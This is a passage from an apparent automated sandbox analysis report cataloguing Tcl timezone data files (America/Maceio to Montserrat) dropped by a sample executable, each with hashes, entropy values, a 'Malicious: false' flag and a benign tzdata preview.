Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Maceio) {. {-9223372036854775808 -8572 0 LMT}. {-1767217028 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -7200

C:\Users\user\Desktop\tcl\tzdata\America\Managua Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	590
Entropy (8bit):	4.233264210289004
Encrypted:	false
SSDEEP:	12:MBp5290znTsmdHOYPprva6/wLAyM/uFn/V8/uFn/3Y/oA2P/RASx/uFn/G/uFn/M:cQGnoeOshRIpMSn/V8Sn/3YVgJvxSn/6
MD5:	6BF9AB156020E7AC62F93F561B314CB8
SHA1:	7484A57EADCFD870490395BB4D6865A2E024B791
SHA-256:	D45B4690B43C46A7CD8001F8AE950CD6C0FF7B01CD5B3623E3DD92C62FD5E473
SHA-512:	CF02E62650679D8E2D58D0D70DE2322CAAA6508AF4FF7A60E415AA8AA3A9D26D1A191CFAE986ACAF0AEF1DFC4C2E34F9A5B6EDC2018E0B7E9000917D429FB587
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Managua) {. {-9223372036854775808 -20708 0 LMT}. {-2524500892 -20712 0 MMT}. {-1121105688 -21600 0 CST}. {105084000 -18000 0 EST}. {161758800 -21600 0 CST}. {290584800 -18000 1 CDT}. {299134800 -21600 0 CST}. {322034400 -18000 1 CDT}. {330584400 -21600 0 CST}. {694260000 -18000 0 EST}. {717310800 -21600 0 CST}. {725868000 -18000 0 EST}. {852094800 -21600 0 CST}. {1113112800 -18000 1 CDT}. {1128229200 -21600 0 CST}. {1146384000 -18000 1 CDT}. {1159682400 -21600 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Manaus Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1142
Entropy (8bit):	4.001810227798472
Encrypted:	false
SSDEEP:	24:cQGnveIo6Skl7s/oySklTs/oiSklP/otHSkl8/oNOSkll/osSklGo/ooSklR/o9/:5/6SklVySklTpiSklo5Skl5oSklOsSk6
MD5:	63089A24AA65FCBAC0EC0FBDFAA1499E
SHA1:	5798A49922AD78C2097E5C6448699D8DB309646A
SHA-256:	7C891305E72EDFCDCFDBEBDB818F4594C87A9D1CFEAE03E656AEFEDD0914D201
SHA-512:	71182C327086BF7B9D4F832282D62EE22710230938D85155219FEFFCEAC7D1F76055A9CDCB6FB23A47C5AACFFC97056EB66E4BAEAD6DBA3075C80074927D21E0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Manaus) {. {-9223372036854775808 -14404 0 LMT}. {-1767211196 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}. {5

C:\Users\user\Desktop\tcl\tzdata\America\Marigot Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	193
Entropy (8bit):	4.845378094505442
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y75AJL4DvFVAIgp5AJ3L290zzJ/905AJLv:MBaIMYqJL40pqJ3L290zzN90qJLv
MD5:	88E185B51CF6075B507015F17126DF39
SHA1:	B3CF26514CBC88AC3DAE9AA1B11900151ED23FCD
SHA-256:	5FACA1EE34C2476DB017BF945825FCCEEF37BE632565E7863CC20BE75EA300F9
SHA-512:	ED5C0A44A294366D331AA9855234C832E734005C6144238ABAFC101D87035096C66FDF6F91EF78D3DE160467F66DD88DDD722851C2A867B756EEAE62D1353871
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Guadeloupe)]} {. LoadTimeZoneFile America/Guadeloupe.}.set TZData(:America/Marigot) $TZData(:America/Guadeloupe).

C:\Users\user\Desktop\tcl\tzdata\America\Martinique Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	242
Entropy (8bit):	4.7982301339896285
Encrypted:	false
SSDEEP:	6:SlSWB9X5290zlJm2OHfueP9dMQR5OfT/VVFUFkCFeR/r:MBp5290znmdHfnP9dMQR5Gb/uFkCFO/r
MD5:	2F7A1415403071E5D2E545C1DAA96A15
SHA1:	6A8FB2ABAD2B2D25AF569624C6C9AAE9821EF70B
SHA-256:	40F3C68A518F294062AC3DD5361BB9884308E1C490EF11D2CFDC93CB219C3D26
SHA-512:	3E4D94AB6A46E6C3BB97304F3A5596A06041C0E0935CC840F4A6EB56D0892778F853959A742C5B832CD8F07AB9B74539C45599F22C080577503B2E34B6CE28C5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Martinique) {. {-9223372036854775808 -14660 0 LMT}. {-2524506940 -14660 0 FFMT}. {-1851537340 -14400 0 AST}. {323841600 -10800 1 ADT}. {338958000 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Matamoros Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6526
Entropy (8bit):	3.7582526108760064
Encrypted:	false
SSDEEP:	192:t+vN41+z6stuNEsRZLbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaANIsr2:taN41+z6stuNEsRZLbXwDTIRqfh57TlE
MD5:	2BBAA150389EAAE284D905A159A61167
SHA1:	0001B50C25FC0CDF015A60150963AAF895EEDEEF
SHA-256:	A7966B95DBE643291FB68E228B60E2DC780F8155E064D96B670C8290F104E4AB
SHA-512:	87CE18E7E4C2C59A953CD47005EF406F4923730459996B1BF09B04FFD9CD5F963A9E50299ECCDBF4B24C565412B706B1ABC39890D659E6F409F1BA50308E57F9
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Matamoros) {. {-9223372036854775808 -24000 0 LMT}. {-1514743200 -21600 0 CST}. {568015200 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {599637600 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 C

C:\Users\user\Desktop\tcl\tzdata\America\Mazatlan Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6619
Entropy (8bit):	3.788952004807415
Encrypted:	false
SSDEEP:	96:W7ezBT8tRkfKxhzY720zaOXmlITHjLc1cb:X8tRkfKv+2wB9h
MD5:	4D63766E65BF3E772CCEC2D6DB3E2D3E
SHA1:	DB541D2908159C7EF98F912D8DBC36755FFD13F3
SHA-256:	81CEA4A397AF6190FD250325CF513976B3508209AE3A88FDFD55490A5016A36D
SHA-512:	DFAF1B3547B1B1B78B33F1F0F5E9624C693492687EC5D060FC4C6CBE2AFBB61B2E9B618133636DD62364D28B2450F741561AADFDE7B811F579BBC7247343A041
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Mazatlan) {. {-9223372036854775808 -25540 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -21600

C:\Users\user\Desktop\tcl\tzdata\America\Mendoza Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	214
Entropy (8bit):	4.76389929825594
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y7/MBVAIgp/Ma290zpH+90/MI:MBaIMY/Mcp/Ma290zpe90/MI
MD5:	A6EFD8F443D4CB54A5FB238D4D975808
SHA1:	8F25C6C0EA9D73DC8D1964C4A28A4E2E783880CC
SHA-256:	39B34B406339F06A8D187F8CCC1B6BF2550E49329F7DCE223619190F560E75F8
SHA-512:	4B5D48472D56AF19B29AD2377573CC8CB3ED9EF1AF53C00C907B6576FA852EA3D1E9F9B3A78A280DC44F8ADBE5B81D6AEC2609BE08FFA08507CD0F4139878F46
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Mendoza)]} {. LoadTimeZoneFile America/Argentina/Mendoza.}.set TZData(:America/Mendoza) $TZData(:America/Argentina/Mendoza).

C:\Users\user\Desktop\tcl\tzdata\America\Menominee Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8136
Entropy (8bit):	3.7460641906933345
Encrypted:	false
SSDEEP:	192:oXxj07ffkeTzZSJw5/9/yuvQ+hcrD57X0N41+IestuNEbYkzbXwDTIRqfhXbdXvC:oXxj07ffNTzZSJw5/9/yuvQ6crD57X0w
MD5:	0D0DC4A816CDAE4707CDF4DF51A18D30
SHA1:	7ED2835AA8F723B958A6631092019A779554CADE
SHA-256:	3C659C1EAC7848BBE8DF00F857F8F81D2F64B56BD1CEF3495641C53C007434FA
SHA-512:	930F2FDC2C1EAE4106F9B37A16BCBBAF618A2CCBBA98C712E8215555CF09B9303D71842DEC38EFAF930DB71E14E8208B14E41E10B54EF98335E01435D0FC3518
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Menominee) {. {-9223372036854775808 -21027 0 LMT}. {-2659759773 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-116438400 -18000 1 CDT}. {-100112400 -21600 0 CST}. {-21484800 -18000 0 EST}. {104914800 -21600 0 CST}. {104918400 -18000 1 CDT}. {120639600 -21600 0 CST}. {126691200 -18000 1 CDT}. {152089200 -21600 0 CST}. {162374400 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 CST}. {262771200 -18000 1 CDT}. {278492400 -21600 0 CST}. {294220800 -18000 1 CDT}. {309942000 -21600 0 CST}. {325670400 -18000 1

C:\Users\user\Desktop\tcl\tzdata\America\Merida Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6435
Entropy (8bit):	3.757504464563519
Encrypted:	false
SSDEEP:	192:gN41+z6stuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sOVEmR:gN41+z6stuNEsRZjWqZL/1dCYDDCxyHo
MD5:	A7C5CFE3FA08D4CEDF6324457EA5766E
SHA1:	83BB96398C0B1B34771940C8F7A19CB78C5EF72F
SHA-256:	A1D7DE7285DC78ADDE1B0A04E05DA44D0D46D4696F67A682D0D28313A53825FE
SHA-512:	092DD7CEF6A5861472965E082171937EEDCFB3AE1821E3C88AA1BDFAB1EC48F765CAC497E3E5C78C19653C78B087C7CE28A8AB76F9073558963234901EF4B4A4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Merida) {. {-9223372036854775808 -21508 0 LMT}. {-1514743200 -21600 0 CST}. {377935200 -18000 0 EST}. {407653200 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 CDT}. {1225004400 -21600 0 CST}. {1238918400 -18000 1 CD

C:\Users\user\Desktop\tcl\tzdata\America\Metlakatla Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.049022161950097
Encrypted:	false
SSDEEP:	24:cQG6JeNYesEmlJ14Rs/a4H/YDmD1bSSs8TZZTnEjnz4pUV/NbQKmScg/kg6TgJTg:5OYvP06z9N1e5udv
MD5:	387FE732AECFB958BD026A71AF0D910D
SHA1:	09281AF828298725C09E6C5274C96A5AAC3E75F5
SHA-256:	60CD2B0A686A0A4689EBCDB70E26AD96A07AD4389738C942BFBE733D060310DA
SHA-512:	A873A9722ADDB7C2B3BEA4D02440A29ED8D79ECCC1740730CD7B5308B226F11A122F4453934D02375F714F9EB0B592BE2FE934258ED16A34C31D02980BC7F3F7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Metlakatla) {. {-9223372036854775808 54822 0 LMT}. {-3225366822 -31578 0 LMT}. {-2188955622 -28800 0 PST}. {-883584000 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-31507200 -28800 0 PST}. {-21477600 -25200 1 PDT}. {-5756400 -28800 0 PST}. {9972000 -25200 1 PDT}. {25693200 -28800 0 PST}. {41421600 -25200 1 PDT}. {57747600 -28800 0 PST}. {73476000 -25200 1 PDT}. {89197200 -28800 0 PST}. {104925600 -25200 1 PDT}. {120646800 -28800 0 PST}. {126698400 -25200 1 PDT}. {152096400 -28800 0 PST}. {162381600 -25200 1 PDT}. {183546000 -28800 0 PST}. {199274400 -25200 1 PDT}. {215600400 -28800 0 PST}. {230724000 -25200 1 PDT}. {247050000 -28800 0 PST}. {262778400 -25200 1 PDT}. {278499600 -28800 0 PST}. {294228000 -25200 1 PDT}. {309949200 -28800 0 PST}. {325677

C:\Users\user\Desktop\tcl\tzdata\America\Mexico_City Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6807
Entropy (8bit):	3.761365047166545
Encrypted:	false
SSDEEP:	192:VeE7nN41+zKstuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sQ:VeE7nN41+zKstuNEsRZjWqZL/1dCYDDK
MD5:	C675DA8A44A9841C417C585C2661EF13
SHA1:	147DDE5DD00E520DA889AC9931088E6232CE6FEA
SHA-256:	82B9AAD03408A9DFC0B6361EC923FEAEF97DBB4B3129B772B902B9DAE345D63E
SHA-512:	00615A5EC0D08BABF009C3CAAF3D631B1F4E2E4324E91B0F29ADD7E61B51C80D5D495D20BD131A9370C3005B2E510C8A4E4869A5032D82BC33C875E909CDE086
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Mexico_City) {. {-9223372036854775808 -23796 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-975261600 -18000 1 CDT}. {-963169200 -21600 0 CST}. {-917114400 -18000 1 CDT}. {-907354800 -21600 0 CST}. {-821901600 -18000 1 CWT}. {-810068400 -21600 0 CST}. {-627501600 -18000 1 CDT}. {-612990000 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001836800 -21600 0 CST}. {1014184800 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000

C:\Users\user\Desktop\tcl\tzdata\America\Miquelon Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7074
Entropy (8bit):	3.8399423763277087
Encrypted:	false
SSDEEP:	192:FtGlRdJVKU7c7q5lynu9b4HwXz+SqgNyz0T2CKm8qHmqpiq21PjgDCghEpW12YXq:ExKZ651i
MD5:	3BE359FC305B39DE06AEBC7E1DA63F42
SHA1:	1F4DD606C5CC277DACC7678E8B82A9C8E8ACDD4F
SHA-256:	BB8E349500B467FE8F2670AF36F8237C12B513CF2832005E70281309C3AA057A
SHA-512:	85017DFFF1BDE833737AF09673CB9001E7EFD10B7C7E83659D425150E11BD1FA56DF8DEC921DB279A853C0379CC15E720BFBB109A8100A3B3D1B4030128BB34A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Miquelon) {. {-9223372036854775808 -13480 0 LMT}. {-1850328920 -14400 0 AST}. {326001600 -10800 0 PMST}. {536468400 -10800 0 PMST}. {544597200 -7200 1 PMDT}. {562132800 -10800 0 PMST}. {576046800 -7200 1 PMDT}. {594187200 -10800 0 PMST}. {607496400 -7200 1 PMDT}. {625636800 -10800 0 PMST}. {638946000 -7200 1 PMDT}. {657086400 -10800 0 PMST}. {671000400 -7200 1 PMDT}. {688536000 -10800 0 PMST}. {702450000 -7200 1 PMDT}. {719985600 -10800 0 PMST}. {733899600 -7200 1 PMDT}. {752040000 -10800 0 PMST}. {765349200 -7200 1 PMDT}. {783489600 -10800 0 PMST}. {796798800 -7200 1 PMDT}. {814939200 -10800 0 PMST}. {828853200 -7200 1 PMDT}. {846388800 -10800 0 PMST}. {860302800 -7200 1 PMDT}. {877838400 -10800 0 PMST}. {891752400 -7200 1 PMDT}. {909288000 -10800 0 PMST}. {923202000 -7200 1 PMDT}. {941342400 -10800 0 PMST}. {954651600 -7200 1 PM

C:\Users\user\Desktop\tcl\tzdata\America\Moncton Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10165
Entropy (8bit):	3.73501024949866
Encrypted:	false
SSDEEP:	192:XYtQYUKXZRMavqQS8L2En/RDmzTWRf2oFnoF8l988fL8vG+81VcfnrpbX+qvlrPf:gQYzCO4alKqYvuOdeYP/Jv
MD5:	C1F34BD1FB4402481FFA5ABEE1573085
SHA1:	46B9AD38086417554549C36A40487140256BED57
SHA-256:	A4C2F586D7F59A192D6D326AD892C8BE20753FB4D315D506F4C2ED9E3F657B9A
SHA-512:	115D3E65A6A3834E748ED1917CF03A835F74EC0F8DB789C2B99EB78879EA3A5A2AFEB35981BA221D868E6A5B579374CFB3F865ACF6D4271B918EBCC2C3C69579
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Moncton) {. {-9223372036854775808 -15548 0 LMT}. {-2715882052 -18000 0 EST}. {-2131642800 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-1167595200 -14400 0 AST}. {-1153681200 -10800 1 ADT}. {-1145822400 -14400 0 AST}. {-1122231600 -10800 1 ADT}. {-1114372800 -14400 0 AST}. {-1090782000 -10800 1 ADT}. {-1082923200 -14400 0 AST}. {-1059332400 -10800 1 ADT}. {-1051473600 -14400 0 AST}. {-1027882800 -10800 1 ADT}. {-1020024000 -14400 0 AST}. {-996433200 -10800 1 ADT}. {-988574400 -14400 0 AST}. {-965674800 -10800 1 ADT}. {-955396800 -14400 0 AST}. {-934743600 -10800 1 ADT}. {-923947200 -14400 0 AST}. {-904503600 -10800 1 ADT}. {-891892800 -14400 0 AST}. {-883598400 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-757368000 -14400 0 AST}. {-747252000 -10800 1 ADT}

C:\Users\user\Desktop\tcl\tzdata\America\Monterrey Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6496
Entropy (8bit):	3.75909042772931
Encrypted:	false
SSDEEP:	192:Xc+vN41+z6stuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sOt:saN41+z6stuNEsRZjWqZL/1dCYDDCxyI
MD5:	255A5A8E27CA1F0127D71E09033C6D9B
SHA1:	4F1C5E6D3F9E5BC9F8958FA50C195FDADD0F4022
SHA-256:	C753DEF7056E26D882DCD842729816890D42B6C7E31522111467C0C39A24B2F2
SHA-512:	96A67C3CC54EC39086D4DF681DDA39B4167FE80F0C45600045480F28C282071915F793BD672146119A22E0C15339F162DFF9DF326E7132E723684EF079666F58
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Monterrey) {. {-9223372036854775808 -24076 0 LMT}. {-1514743200 -21600 0 CST}. {568015200 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {599637600 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 C

C:\Users\user\Desktop\tcl\tzdata\America\Montevideo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7813
Entropy (8bit):	3.7996174594138354
Encrypted:	false
SSDEEP:	192:XnG6+CKN0FXVMspFpFCDBS2lyrDFNaat8VBKeQm/Ihmq/1iKHnXf3WLQWc/WKDW+:3ax2pD
MD5:	FFECDDDDA3716A0E0CDAA72F8E513EBD
SHA1:	F0D39F71694F5DF3BC39F19340E51C4B7B42C560
SHA-256:	B44390E665901FE73BD26CA65BC24D7C98D181D7BD227E7797F589045EC444A7
SHA-512:	F56357CDF1A19B67E44879243643FEBAFBE4096B2485265A9A81803B786A7501FA1B9EEFAA3E42EC6D62D5AD8C2E8E32785DA4C107B47CBD425E76D58E304802
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Montevideo) {. {-9223372036854775808 -13484 0 LMT}. {-2256668116 -13484 0 MMT}. {-1567455316 -12600 0 UYT}. {-1459542600 -10800 1 UYHST}. {-1443819600 -12600 0 UYT}. {-1428006600 -10800 1 UYHST}. {-1412283600 -12600 0 UYT}. {-1396470600 -10800 1 UYHST}. {-1380747600 -12600 0 UYT}. {-1141590600 -10800 1 UYHST}. {-1128286800 -12600 0 UYT}. {-1110141000 -10800 1 UYHST}. {-1096837200 -12600 0 UYT}. {-1078691400 -10800 1 UYHST}. {-1065387600 -12600 0 UYT}. {-1046637000 -10800 1 UYHST}. {-1033938000 -12600 0 UYT}. {-1015187400 -10800 1 UYHST}. {-1002488400 -12600 0 UYT}. {-983737800 -10800 1 UYHST}. {-971038800 -12600 0 UYT}. {-952288200 -10800 1 UYHST}. {-938984400 -12600 0 UYT}. {-920838600 -10800 1 UYHST}. {-907534800 -12600 0 UYT}. {-896819400 -10800 1 UYHST}. {-853623000 -10800 0 UYT}. {-853621200 -7200 1 UYST}. {-845848800 -10800 0 UYT}

C:\Users\user\Desktop\tcl\tzdata\America\Montreal Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10915
Entropy (8bit):	3.724287892327294
Encrypted:	false
SSDEEP:	192:XMMNzQdbgZ8UMrVWrrn+qvOTFhPI1jFIL:cMNzQdbgZFMrVSn93+
MD5:	824B94F07F7BCB9553490D7A83DD5EC6
SHA1:	BE9F848DA85B28414BEF02B6BB5306ECAC06405E
SHA-256:	6C8EE1D4FDA561253BE39A67F2A7A838C2FA66F850A4AFFBF3FDC8C1D61F5B40
SHA-512:	C2F9D7479994F27531053AA37CAAADE225B6359FDD6A1E98955D0921FD70535A0970DA32698DB3645E52583B45E4A880563112D5F33FF56F98A1BDFC5608C9C7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Montreal) {. {-9223372036854775808 -17656 0 LMT}. {-2713892744 -18000 0 EST}. {-1665334800 -14400 1 EDT}. {-1662753600 -18000 0 EST}. {-1640977200 -18000 0 EST}. {-1632070800 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-1609441200 -18000 0 EST}. {-1601742600 -14400 1 EDT}. {-1583775000 -18000 0 EST}. {-1567355400 -14400 1 EDT}. {-1554053400 -18000 0 EST}. {-1535907600 -14400 1 EDT}. {-1522603800 -18000 0 EST}. {-1504458000 -14400 1 EDT}. {-1491154200 -18000 0 EST}. {-1439830800 -14400 1 EDT}. {-1428255000 -18000 0 EST}. {-1409504400 -14400 1 EDT}. {-1396805400 -18000 0 EST}. {-1378054800 -14400 1 EDT}. {-1365355800 -18000 0 EST}. {-1346612400 -14400 1 EDT}. {-1333915200 -18000 0 EST}. {-1315162800 -14400 1 EDT}. {-1301860800 -18000 0 EST}. {-1283713200 -14400 1 EDT}. {-1270411200 -18000 0 EST}. {-1252263600 -14400 1 EDT}. {-123896160

C:\Users\user\Desktop\tcl\tzdata\America\Montserrat Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	152
Entropy (8bit):	4.963461567788273
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGEzQ1XXpXGm2OHdVkevUdRfXR5vwvYv:SlSWB9X5290zQ1HYm2OHXkeG55r
MD5:	93C77D10FCE23705875E206671246BB0
SHA1:	428010B0532A3EABE595CF9947C27F920053410E
SHA-256:	DC184A13889A41F3D6C3425917F0820A5B2BFA9789CE341D09BAEE757DE59454
SHA-512:	AE1D29DBC41B6547ACE391D8BD1D1BE67C991E5D479CD0F0293C411C73E248F700EB7293AD29F4E3789D29FECD19076522B1272422999D5F4600B2DC3C6260E3
